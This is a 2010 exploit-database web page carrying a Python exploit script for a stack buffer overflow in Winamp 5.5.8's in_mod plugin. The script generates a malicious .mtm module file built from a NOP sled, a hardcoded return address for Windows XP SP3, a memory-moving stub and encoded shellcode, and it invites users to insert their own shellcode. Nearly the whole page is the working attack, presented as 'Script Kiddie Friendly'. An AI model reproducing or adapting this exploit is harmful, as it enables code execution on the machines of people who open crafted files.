[local exploits] - Winamp 5.5.8.2985 (in_mod plugin) Stack O

Posted on 25 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version) in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===================================================================
Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version)
===================================================================

#!/usr/bin/python 
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# A Script Kiddie Friendly Production
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet 
# Bug found by http://www.exploit-db.com/exploits/15248/
# An improvement to http://www.exploit-db.com/exploits/15287/
# POC by fdisk
# MemMove Idea from: A.Gomez
# Exploit by Mighty-D and 7eK
# Special thanks to: 
# fdisk: Who wrote the skeleton of what you are looking at 
# Ryujin: For pointing the bug 
# EDB-Team
# UdeA GITA SSI
 
 
import struct
 
def fill(shellcode):
       nopsFaltantes = ((len(shellcode) / 40)+1)*40 - len(shellcode)
       shellcode += &#039;x90&#039;*nopsFaltantes
       return shellcode
 
 
header = &quot;x4Dx54x4Dx10x63x6Cx69x63x6Bx20x68x65x72x65x20x66x6Fx72x20x69x6Ex66x6Fx21xE0x00x29x39xFFxFFx1Fx00x40x0E&quot;
header += &quot;x78&quot; * 32
buffersize = 65536
 
nopsled = &quot;x90&quot; * 58200  +&quot;x90&quot;*7
eip = &quot;xEDx1Ex95x7C&quot;
 
shellcode = &quot;x90x90x90&quot;+&quot;x81xECx19x78xFFxFF&quot; #    REALIGN ESP
#[*] x86/alpha_upper encoder
# Place your shellcode here!
shellcode += &quot;x89xe2xdbxc3xd9x72xf4x5fx57x59x49x49x49x49&quot; +
&quot;x43x43x43x43x43x43x51x5ax56x54x58x33x30x56&quot; +
&quot;x58x34x41x50x30x41x33x48x48x30x41x30x30x41&quot; +
&quot;x42x41x41x42x54x41x41x51x32x41x42x32x42x42&quot; +
&quot;x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx43&quot; +
&quot;x5ax4ax4bx50x4dx4bx58x4cx39x4bx4fx4bx4fx4b&quot; +
&quot;x4fx45x30x4cx4bx42x4cx51x34x47x54x4cx4bx51&quot; +
&quot;x55x47x4cx4cx4bx43x4cx45x55x44x38x43x31x4a&quot; +
&quot;x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx47x50x43&quot; +
&quot;x31x4ax4bx50x49x4cx4bx50x34x4cx4bx43x31x4a&quot; +
&quot;x4ex50x31x4fx30x4cx59x4ex4cx4cx44x49x50x43&quot; +
&quot;x44x45x57x49x51x49x5ax44x4dx45x51x4fx32x4a&quot; +
&quot;x4bx4ax54x47x4bx50x54x46x44x47x58x43x45x4a&quot; +
&quot;x45x4cx4bx51x4fx51x34x43x31x4ax4bx42x46x4c&quot; +
&quot;x4bx44x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4a&quot; +
&quot;x4bx43x33x46x4cx4cx4bx4dx59x42x4cx46x44x45&quot; +
&quot;x4cx45x31x4fx33x50x31x49x4bx45x34x4cx4bx51&quot; +
&quot;x53x46x50x4cx4bx51x50x44x4cx4cx4bx44x30x45&quot; +
&quot;x4cx4ex4dx4cx4bx47x30x43x38x51x4ex42x48x4c&quot; +
&quot;x4ex50x4ex44x4ex4ax4cx50x50x4bx4fx48x56x43&quot; +
&quot;x56x50x53x43x56x43x58x46x53x47x42x45x38x43&quot; +
&quot;x47x43x43x46x52x51x4fx46x34x4bx4fx4ex30x45&quot; +
&quot;x38x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx48&quot; +
&quot;x56x51x4fx4bx39x4dx35x45x36x4bx31x4ax4dx44&quot; +
&quot;x48x44x42x50x55x43x5ax45x52x4bx4fx48x50x42&quot; +
&quot;x48x4ex39x44x49x4bx45x4ex4dx50x57x4bx4fx49&quot; +
&quot;x46x46x33x46x33x46x33x50x53x51x43x51x53x50&quot; +
&quot;x53x51x53x46x33x4bx4fx4ex30x45x36x42x48x44&quot; +
&quot;x51x51x4cx45x36x51x43x4cx49x4dx31x4ax35x42&quot; +
&quot;x48x4fx54x45x4ax44x30x48x47x50x57x4bx4fx49&quot; +
&quot;x46x42x4ax44x50x46x31x50x55x4bx4fx48x50x45&quot; +
&quot;x38x49x34x4ex4dx46x4ex4ax49x46x37x4bx4fx48&quot; +
&quot;x56x51x43x50x55x4bx4fx4ex30x45x38x4dx35x47&quot; +
&quot;x39x4dx56x47x39x50x57x4bx4fx48x56x50x50x50&quot; +
&quot;x54x51x44x51x45x4bx4fx4ex30x4cx53x43x58x4d&quot; +
&quot;x37x42x59x4fx36x42x59x51x47x4bx4fx4ex36x51&quot; +
&quot;x45x4bx4fx48x50x45x36x42x4ax42x44x42x46x42&quot; +
&quot;x48x43x53x42x4dx4bx39x4dx35x43x5ax50x50x51&quot; +
&quot;x49x46x49x48x4cx4cx49x4dx37x43x5ax50x44x4b&quot; +
&quot;x39x4dx32x46x51x4fx30x4ax53x4fx5ax4bx4ex51&quot; +
&quot;x52x46x4dx4bx4ex50x42x46x4cx4cx53x4cx4dx42&quot; +
&quot;x5ax50x38x4ex4bx4ex4bx4ex4bx43x58x42x52x4b&quot; +
&quot;x4ex4fx43x44x56x4bx4fx42x55x47x34x4bx4fx49&quot; +
&quot;x46x51x4bx50x57x50x52x46x31x50x51x50x51x43&quot; +
&quot;x5ax45x51x50x51x46x31x46x35x50x51x4bx4fx48&quot; +
&quot;x50x42x48x4ex4dx48x59x44x45x48x4ex50x53x4b&quot; +
&quot;x4fx49x46x43x5ax4bx4fx4bx4fx46x57x4bx4fx48&quot; +
&quot;x50x4cx4bx50x57x4bx4cx4dx53x4fx34x45x34x4b&quot; +
&quot;x4fx49x46x46x32x4bx4fx4ex30x42x48x4ax50x4c&quot; +
&quot;x4ax45x54x51x4fx50x53x4bx4fx48x56x4bx4fx48&quot; +
&quot;x50x41x41&quot;
 
shellcode = fill(shellcode)
nroChunks = (len(shellcode) / 40)
 
strNroChunks = struct.pack(&quot;B&quot;, nroChunks+13) #El shellcode del mmove resta 13
print ( &quot;nroChunks=0x%X, strNroChunks=0x%X&quot; % (nroChunks,
struct.unpack(&quot;B&quot;, strNroChunks)[0] ) )
 
#add strNroChunks
mmove =&quot;x90x90x90x90x90x90x90x90x90x90x90x90x90x89xe3x81xebxccxfexffxffxffxe3x60x89xfdx8bx45x3cxf7xd8x29xc5x8bx7dx78xf7xd8x29xc5xf7xddx29xefx8bx4fx18x50x90x90x90x90x90x58x8bx5fx20x29xebxf7xddx85xc9x75x0dxffx61xc3x90x90x90x90x90x90x90x90x90x90x90x49x8bx34x8bxf7xddx29xeexf7xddx31xc0x99xfcxacx84xc0x74x20xc1xcax0dxffxf7xd8x29xc2xf7xd8xebxeex90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x3bx54x24x28x75xb2x8bx5fx24x50x90x90x90x90x58xf7xddx29xebx50x53xf7xd9x29xcbx29xcbx31xc0xb0x20x29xc3xf7xd9x66x8bx4bx20x5bx58x4fx4fx4fx4fx8bx5fx20x47x50x90x90x90x58x47x47x47x29xebx53x52x31xd2xb2x20xf7xd9x29xcbx29xcbx29xcbx29xcbx29xd3x8bx43x20xf7xd9x5ax5bx29xe8xf7xddx4cx50x90x90x90x58x4cx4cx4cx89x44x24x20x44x44x44x44x61xc3x90x90x31xdbxb3x80x29xdcx5bx89xe5x31xc0x64x8bx40x30x48x8bx40x0dxffx48x48x48x48x8bx70x20xadx2cx20x8bx78x28x2cx20x89x7dx60x4cx4cx4cx4cx4cx4cx4cx4cx52x44x44x44x44x44x44x44x44x50x90x90x90x90x90x90x58xbax6cx2cxecxc9xf7xdax81xeax22x22x22x22xf7xdax52x4cx4cx4cx4cx5ax57xe8xc0xfexffxffx53x89xebx80xebx20x50x90x90x90x90x90x58x89x43x20x5bx31xc0x2cx80x2cx70x29xc5x31xc0x50x68x6cx20x20x20x68x6cx2ex64x6cx68x6ex74x64x6cx54x89xe8x2cx90x50x90x90x90x58x2cx80x8bx40x20xffxd0x89xc7x68x58xecx6ax5fx57xe8x73xfexffxffx90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x50x90x90x90x58x89xe5x31xd2x66x81xeax9cxfcx90x90x90x90x90x66xf7xdax66x29xd5x31xd2x66xbax77x27x29xd4x89xe7x54x31xc9xb1&quot;+strNroChunks+&quot;x50x90x90x90x90x58xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9xfexc9x50x31xc0xb0x28xfexc0x50x90x90x90x90x58xfexc0x31xd2xb2&quot;+strNroChunks+&quot;xfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcaxfexcax29xcax50x90x90x90x90x90x90x58xf6xe2x89xc6x58xf7xddx29xeexf7xddx50x51x31xdbxb3x28x53x56x57xffxd0x66x81xecxf4xffx59x58x31xdbxb3x28x50x90x90x90x90x58xf7xdbx29xdfx31xdbxfexcbx29xdexe2x90x5fxffxd7&quot; + &quot;x90&quot;*20
 
nops = &quot;x90&quot;*70
 
payload = header + nopsled + eip + nops + mmove + shellcode;
 
file = open(&quot;crash.mtm&quot;, &quot;w&quot;)
file.write(payload)
file.close()
 
print &quot;mtm file generated successfuly&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-25]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20